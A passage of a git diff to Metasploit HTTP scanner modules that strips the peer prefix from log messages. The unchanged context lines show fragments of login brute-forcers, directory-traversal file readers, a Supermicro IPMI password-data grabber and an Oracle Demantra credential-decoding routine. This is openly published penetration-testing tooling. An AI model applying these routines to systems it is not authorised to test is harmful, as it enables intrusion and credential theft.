print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb index a0a33b9188..8a5734b6b9 100644 --- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb +++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb @@ -132,17 +132,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.headers['Content-Length'].to_i - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call diff --git a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 6644b0b7d4..5f7bb5fc2b 100644 --- a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ - print_good("#{peer} - Request may have succeeded on file #{file}") + print_good("Request may have succeeded on file #{file}") report_web_vuln({ :host => rhost, :port => rport, @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Auxiliary }) loot = store_loot("lfi.data","text/plain", rhost, res.body, file) - vprint_good("#{peer} - File #{file} downloaded to: #{loot}") + vprint_good("File #{file} downloaded to: #{loot}") elsif res and res.code - vprint_error("#{peer} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + vprint_error("Attempt returned HTTP error #{res.code} when trying to access #{file}") end end @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary user = datastore['USERNAME'] pass = datastore['PASSWORD'] - vprint_status("#{peer} - Trying to login with #{user} / #{pass}") + vprint_status("Trying to login with #{user} / #{pass}") # test login begin @@ -100,14 +100,14 @@ class Metasploit3 < Msf::Auxiliary return :abort if (res.code == 404) if [200, 301, 302].include?(res.code) - vprint_good("#{peer} - Successful login #{user}/#{pass}") + vprint_good("Successful login #{user}/#{pass}") else - vprint_error("#{peer} - No successful login possible with #{user}/#{pass}") + vprint_error("No successful login possible with #{user}/#{pass}") return :abort end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return :abort end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb index bc2663f8f3..de18f8805b 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb index 844c503987..cabefe1b8f 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = res.body f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 49e1d33495..6bcc2dcb1e 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Auxiliary 'headers' => { "Authorization" => "NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="} }) rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb index f78d63b8c2..3402e97dd7 100644 --- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb +++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -59,15 +59,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 302 and res.headers['Location'] and res.headers['Location'].include?("/provision/index.php")) - vprint_good("#{peer} - Running OpenMind Message-OS Provisioning portal...") + vprint_good("Running OpenMind Message-OS Provisioning portal...") return true else - vprint_error("#{peer} - Application is not OpenMind. Module will not continue.") + vprint_error("Application is not OpenMind. Module will not continue.") return false end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 302 and res.headers['Location'].include?("frameset")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index fb87ec82e4..4d69c421a2 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -53,25 +53,25 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? or res.body.empty? - vprint_error("#{peer} - No content retrieved") + vprint_error("No content retrieved") return end if res.code == 404 - vprint_error("#{peer} - File not found") + vprint_error("File not found") return end if res.code == 200 creds = "" - vprint_status("#{peer} - String received: #{res.body.to_s}") unless res.body.blank? + vprint_status("String received: #{res.body.to_s}") unless res.body.blank? res.body.to_s.split(",").each do|c| i = c.to_i ^ 0x50 creds += i.chr end - print_good("#{peer} - Credentials decoded: #{creds}") unless creds.empty? + print_good("Credentials decoded: #{creds}") unless creds.empty? end end diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb index bc29b6d04c..2f1167132c 100644 --- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb +++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -57,15 +57,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager")) - vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...") + vprint_good("Running Oracle Integrated Lights Out Manager portal...") return true else - vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.") + vprint_error("Application is not Oracle ILOM. Module will not continue.") return false end end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -117,12 +117,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index 8aed527ef6..f1107f89a4 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end @@ -50,15 +50,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD") - vprint_good("#{peer} - Running PocketPAD application ...") + vprint_good("Running PocketPAD application ...") return true else - vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") + vprint_error("Application is not PocketPAD. Module will not continue.") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -107,12 +107,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end diff --git a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb index 8cf4fdc12f..abcb16ce3f 100644 --- a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb +++ b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -63,15 +63,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return false end if (res and res.headers['Server'] and res.headers['Server'].include?("Radware-web-server")) - vprint_good("#{peer} - Running Radware portal...") + vprint_good("Running Radware portal...") return true else - vprint_error("#{peer} - Application is not Radware. Module will not continue.") + vprint_error("Application is not Radware. Module will not continue.") return false end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user,pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end if (res and res.code == 302 and res.headers['Location'].include?('redirectId')) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/rips_traversal.rb b/modules/auxiliary/scanner/http/rips_traversal.rb index 2cc3915992..2b42cb8c54 100644 --- a/modules/auxiliary/scanner/http/rips_traversal.rb +++ b/modules/auxiliary/scanner/http/rips_traversal.rb @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index 3cea0a550b..49fa51058f 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary t = "/.." * datastore['DEPTH'] - vprint_status("#{peer} - Retrieving #{datastore['FILE']}") + vprint_status("Retrieving #{datastore['FILE']}") # No permission to access.log or proc/self/environ, so this is all we do :-/ uri = normalize_uri(uri, 'index.php') @@ -58,13 +58,13 @@ class Metasploit3 < Msf::Auxiliary }) if not res - vprint_error("#{peer} - Server timed out") + vprint_error("Server timed out") elsif res and res.body =~ /Error 404 requested page cannot be found/ - vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it") + vprint_error("Either the file doesn't exist, or you don't have the permission to get it") else # We don't save the body by default, because there's also other junk in it. # But we still have a SAVE option just in case - print_good("#{peer} - #{datastore['FILE']} retrieved") + print_good("#{datastore['FILE']} retrieved") vprint_line(res.body) if datastore['SAVE'] @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary res.body, ::File.basename(datastore['FILE']) ) - print_good("#{peer} - File saved as: #{p}") + print_good("File saved as: #{p}") end end end diff --git a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb index f3f7d1d534..64f8ba1137 100644 --- a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb +++ b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary filename = datastore['FILE'] filename = filename[1, filename.length] if filename =~ /^\// - vprint_status("#{peer} - Retrieving file #{datastore['FILE']}") + vprint_status("Retrieving file #{datastore['FILE']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), @@ -61,9 +61,9 @@ class Metasploit3 < Msf::Auxiliary # The "Loding domain list To login AD authentication or local Authentication" string is returned in the response on a fixed version (build 9111) if res && res.code == 200 if res.body =~ /The File was not found/ - vprint_error("#{peer} - Vulnerable server, but the file does not exist!") + vprint_error("Vulnerable server, but the file does not exist!") elsif res.body =~ /Loding domain list To login AD authentication or local Authentication/ - vprint_error("#{peer} - The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") + vprint_error("The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") else p = store_loot( 'manageengine.servicedeskplus', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Auxiliary res.body, filename ) - print_good("#{peer} - File saved in: #{p}") + print_good("File saved in: #{p}") end else - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") end end end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb index 093251a16e..c7f90ebff3 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, 'IPMIdevicedesc.xml' ) - print_good("#{peer} - Stored the device description XML in #{path}") + print_good("Stored the device description XML in #{path}") return true else return false @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_supermicro? - vprint_error("#{peer} - This does not appear to be a Supermicro IPMI controller") + vprint_error("This does not appear to be a Supermicro IPMI controller") return end @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary next unless res unless res.code == 200 && res.body.length > 0 - vprint_status("#{peer} - Request for #{uri} resulted in #{res.code}") + vprint_status("Request for #{uri} resulted in #{res.code}") next end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, uri.split('/').last ) - print_good("#{peer} - Password data from #{uri} stored to #{path}") + print_good("Password data from #{uri} stored to #{path}") end end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb index 206f7f416f..26cd5777e9 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb @@ -119,18 +119,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - vprint_status("#{peer} - Checking if it's a Supermicro IPMI web interface...") + vprint_status("Checking if it's a Supermicro IPMI web interface...") if is_supermicro? - vprint_good("#{peer} - Supermicro IPMI web interface found") + vprint_good("Supermicro IPMI web interface found") else - vprint_error("#{peer} - Supermicro IPMI web interface not found") + vprint_error("Supermicro IPMI web interface not found") return end - vprint_status("#{peer} - Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") result = check_login if result - print_good("#{peer} - Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, @@ -140,10 +140,10 @@ class Metasploit3 < Msf::Auxiliary }) end - vprint_status("#{peer} - Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") result = check_close_window if result - print_good("#{peer} - Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index d7873f017b..b7a87ad514 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary travs << "../" * datastore['DEPTH'] travs << file - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi({ "uri" => "/cgi/url_redirect.cgi", @@ -111,26 +111,26 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Checking if it's a #{APP_NAME}....") + print_status("Checking if it's a #{APP_NAME}....") if is_supermicro? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - #{APP_NAME} not found") + print_error("#{APP_NAME} not found") return end - print_status("#{peer} - Login into the #{APP_NAME}...") + print_status("Login into the #{APP_NAME}...") session = login if session.nil? - print_error("#{peer} - Failed to login, check credentials.") + print_error("Failed to login, check credentials.") return else - print_good("#{peer} - Login successful, session: #{session}") + print_good("Login successful, session: #{session}") end contents = read_file(datastore['FILEPATH'], session) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb index ad2a235717..015e81013f 100644 --- a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary uri = target_uri.path peer = "#{ip}:#{rport}" - vprint_status("#{peer} - Retrieving cookie") + vprint_status("Retrieving cookie") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "") @@ -57,10 +57,10 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 session = res.get_cookies else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end - vprint_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + vprint_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "j_security_check"), @@ -76,14 +76,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 302 - vprint_status("#{peer} - Login succesful") + vprint_status("Login succesful") else - vprint_error("#{peer} - Login was not succesful!") + vprint_error("Login was not succesful!") return end randomname = Rex::Text.rand_text_alphanumeric(10) - vprint_status("#{peer} - Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") + vprint_status("Creating ticket with our requested file [ #{datastore['FILE']} ] as attachment") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "WorkOrder.do"), @@ -114,21 +114,21 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 - vprint_status("#{peer} - Ticket created") + vprint_status("Ticket created") if (res.body =~ /FileDownload.jsp\?module=Request\&ID=(\d+)\&authKey=(.*)\" class=/) fileid = $1 - vprint_status("#{peer} - File ID is [ #{fileid} ]") + vprint_status("File ID is [ #{fileid} ]") fileauthkey = $2 - vprint_status("#{peer} - Auth Key is [ #{fileauthkey} ]") + vprint_status("Auth Key is [ #{fileauthkey} ]") else - vprint_error("#{peer} - File ID and AuthKey not found!") + vprint_error("File ID and AuthKey not found!") end else - vprint_error("#{peer} - Ticket not created due to error!") + vprint_error("Ticket not created due to error!") return end - vprint_status("#{peer} - Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") + vprint_status("Requesting file [ #{uri}workorder/FileDownload.jsp?module=Request&ID=#{fileid}&authKey=#{fileauthkey} ]") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), @@ -151,9 +151,9 @@ class Metasploit3 < Msf::Auxiliary data, datastore['FILE'] ) - print_good("#{peer} - [ #{datastore['FILE']} ] loot stored as [ #{p} ]") + print_good("[ #{datastore['FILE']} ] loot stored as [ #{p} ]") else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end end end diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index 82b8f3d7f4..ede1e33c3c 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -111,10 +111,10 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Unable to download the file. The server timed out.") + print_error("Unable to download the file. The server timed out.") return elsif res and res.body.empty? - print_error("#{peer} - File not found or empty.") + print_error("File not found or empty.") return end @@ -123,24 +123,24 @@ class Metasploit3 < Msf::Auxiliary f = ::File.basename(fname) p = store_loot('symantec.brightmail.file', 'application/octet-stream', rhost, res.body, f) - print_good("#{peer} - File saved as: '#{p}'") + print_good("File saved as: '#{p}'") end def run_host(ip) sid, last_login = get_login_data if sid.empty? or last_login.empty? - print_error("#{peer} - Missing required login data. Cannot continue.") + print_error("Missing required login data. Cannot continue.") return end username = datastore['USERNAME'] password = datastore['PASSWORD'] if not auth(username, password, sid, last_login) - print_error("#{peer} - Unable to login. Cannot continue.") + print_error("Unable to login. Cannot continue.") return else - print_good("#{peer} - Logged in as '#{username}:#{password}'") + print_good("Logged in as '#{username}:#{password}'") end fname = datastore['FILENAME'] diff --git a/modules/auxiliary/scanner/http/typo3_bruteforce.rb b/modules/auxiliary/scanner/http/typo3_bruteforce.rb index c94347a9f9..46fc088080 100644 --- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb +++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Trying to bruteforce login") + print_status("Trying to bruteforce login") res = send_request_cgi({ 'method' => 'GET', @@ -67,10 +67,10 @@ class Metasploit3 < Msf::Auxiliary end def try_login(user, pass) - vprint_status("#{peer} - Trying username:'#{user}' password: '#{pass}'") + vprint_status("Trying username:'#{user}' password: '#{pass}'") cookie = typo3_backend_login(user, pass) if cookie - print_good("#{peer} - Successful login '#{user}' password: '#{pass}'") + print_good("Successful login '#{user}' password: '#{pass}'") report_cred( ip: rhost, port: rport, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - failed to login as '#{user}' password: '#{pass}'") + vprint_error("failed to login as '#{user}' password: '#{pass}'") return end end diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 5c14785e1e..329ad2b77f 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary begin sid = get_sid if sid.nil? - vprint_error("#{peer} - Failed to get sid") + vprint_error("Failed to get sid") return :abort end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary 'cookie' => sid }) rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT - vprint_error("#{peer} - Service failed to respond") + vprint_error("Service failed to respond") return :abort end @@ -117,9 +117,9 @@ class Metasploit3 < Msf::Auxiliary when /User name already confirmed/ return :skip_user when /Invalid password/ - vprint_status("#{peer} - Username found: #{user}") + vprint_status("Username found: #{user}") when /\<a href="process\.php\?logout=1"\>/ - print_good("#{peer} - Successful login: \"#{user}:#{pass}\"") + print_good("Successful login: \"#{user}:#{pass}\"") report_cred(ip: rhost, port: rport, user:user, password: pass, proof: res.body) return :next_user end @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) each_user_pass { |user, pass| - vprint_status("#{peer} - Trying \"#{user}:#{pass}\"") + vprint_status("Trying 